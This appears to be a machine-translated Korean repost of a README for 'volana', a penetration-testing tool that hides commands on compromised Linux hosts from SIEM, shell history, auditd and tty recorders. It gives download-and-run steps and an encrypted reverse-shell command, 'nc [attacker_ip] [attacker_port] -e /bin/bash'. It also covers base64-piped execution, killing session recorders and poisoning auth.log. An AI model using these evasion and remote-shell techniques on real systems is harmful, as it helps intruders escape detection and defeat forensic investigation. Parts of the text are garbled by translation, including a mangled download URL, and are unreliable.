침투 테스트 중 중요한 측면 은 은폐 입니다 . 그러므로 통과한 후에는 흔적을 지워야 합니다 . 그러나 많은 인프라에서는 명령을 실시간으로 기록하고 SIEM
에 전송하므로 사후 정리 부분 자체가 쓸모 없게 됩니다. 자체 셸 런타임을 제공하여 손상된 시스템에서 실행되는 명령을 숨기는 간단한 방법을 제공합니다(명령을 입력하면 volana가 이를 실행합니다). 이렇게 하면 지나갈 때 흔적을 지울 수 있습니다.
대화형 쉘이 필요합니다. (그것을 생성하는 방법을 찾으십시오. 당신은 해커이고 당신의 직업입니다! 그렇지 않으면 ). 그런 다음 대상 컴퓨터에서 다운로드하여 실행하십시오. 그게 다입니다. 이제 비밀리에 실행하려는 명령을 입력할 수 있습니다
## github 릴리스에서 다운로드하세요<br>## 손상된 시스템에서 인터넷에 액세스할 수 없다면 다른 방법을 찾으세요<br>curl -lO -L <a href= " https://github.com/ariary/volana/releases/latest/download/volana " rel="nofollow"><span>https</span><span>://</span><span>github</span><span>.</span><span>com</span><span >/</span><span>아리아리</span><span>/</span><span>볼라나 </span><span>/</span><span>릴리스</span><span>/</span><span>최신</span><span>/</span><span>다운로드</span> 스팬><span>다운로드</span><span> 스팬><span>/</span><span>volana</span></a><br><br>## 실행하세요<br>./volana<br><br>## 이제 감시 대상이 됩니다.<br>volana » echo "안녕하세요 SIEM 팀! 저를 찾으셨나요? > #조금 건방져도 됩니다<br>volana » [command]<br>
volana 콘솔 키워드: * ring: 링 모드를 활성화합니다. 즉, 각 명령은 추적을 처리하기 위해 많은 수의 다른 명령과 함께 실행됩니다(시스템 호출 모니터링의 솔루션). * 종료: volana 콘솔 종료
비대화형 쉘(webshell 또는 blind rce)이 있다고 가정하면 <a href=" https://www.kitploit.com/search/label/Encrypt " target="_blank" title="encrypt"> 하위 명령을 암호화하고 해독합니다. 이전에는 volana 내장 암호화 키를 사용해야 했습니다 . 공격자 머신에서 ## 암호화 키로 volana 빌드<br>make build.volana-with-encryption<br><br>## TARGET에 전송(탐지 가능한 고유 명령)<br>## [.. .] <br><br>## 은밀하게 실행하려는 명령을 암호화합니다<br>## (대화형 쉘을 얻기 위한 nc 바인딩 쉘)<br>volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"<br>>>> 암호화된 명령<br> 암호화된 명령을 복사하고 대상 머신에서 rce를 사용하여 실행합니다 ./volana decr [encrypted_command]<br>## 이제 binshell을 생성하여 대화형으로 만들고 일반적으로 volana를 사용하여 스텔스(./volana)로 사용합니다. + 떠나기 전에 volana 바이너리를 제거하는 것을 잊지 마세요. 암호 해독 키를 쉽게 검색할 수 있습니다.)<br><br> echo [command] | 왜 숨겨진 명령을 사용하지 않는 걸까요? 그런 다음 echo [encoded_command] | base64 -d | bash base64 사용 경고를 트리거하거나 명령에서 base64 텍스트를 찾는 시스템으로부터 보호하기를 원합니다. 우리는 또한 조사를 어렵게 만들고 싶고 base64는 실제로 방해가 되지 않습니다.
이 볼라나는 당신을 완전히 보이지 않게 만드는 기적이 아니라는 것을 기억하십시오. 그 목적은 침입 탐지 및 조사를 더욱 어렵게 만드는 것입니다.
감지는 특정 명령이 실행될 경우 경고를 트리거할 수 있는지 여부를 의미합니다.
volana는 시작 명령줄만 캡처합니다.
그러나 실행하기 전에 공백을 추가하면 기본 bash 동작은 공백을 저장하지 않는 것입니다.- 과거 명령 출력 기반 탐지 시스템
- 기록 파일 기반 탐지 시스템
- .bash_history, ".zsh_history" 등..
- Bash 디버깅 트랩 기반 탐지 시스템
- sudo 내장 로깅 시스템 기반 탐지 시스템
- 계측 시스템은 시스템 전체의 모든 프로세스(예: opensnoop)에 대한 시스템 호출을 추적합니다.
- 터미널(tty) 레코더(스크립트,,, 등) screen -L sexonthebash ovh-ttyrec
- 감지 및 방지가 용이함: pkill -9 스크립트
- 일반적인 상황은 아니다
- 화면은 피하기가 조금 어렵지만 입력을 기록하지 않습니다. (비밀 입력: stty -echo=> 회피)
- volana는 암호화를 통해 명령 감지를 피할 수 있나요?
- 알 수 없는 명령을 경고하는 탐지 시스템(volana one)
- 키로거 기반 탐지 시스템
- 피하기 쉬움: 명령 복사/붙여넣기
- 일반적인 상황은 아니다
- syslog 파일 기반 탐지 시스템(예: /var/log/auth.log)
- sudo 또는 su 명령에서만 작동합니다.
- syslog 파일은 원하는 대로 수정되고 오염될 수 있습니다(예: /var/log/auth.log : logger -p auth.info "해커는 syslog 솔루션을 오염시키지 않습니다. 걱정하지 마십시오.")
- syscall 기반 탐지 시스템(예: auditd, LKML/eBPF)
- 분석하기 어렵고 시스템 호출을 여러 번 전환하면 읽을 수 없게 될 수 있습니다.
- LD_PRELOAD 주입을 맞춤설정하여 로그 만들기
- 이건 일반적인 상황이 아니야
다음 항목을 찾으면 알려주시기 바랍니다. * volana를 감지하는 방법 * volana 명령을 감지하지 못하는 콘솔을 모니터링하는 방법 * 시스템 감지를 방지하는 방법
여기에서 신고하세요.
- 콘솔을 모니터링하는 8가지 방법
- Moonwalk : 통과 후 흔적을 정리하는 유사한 도구
볼라나 다운로드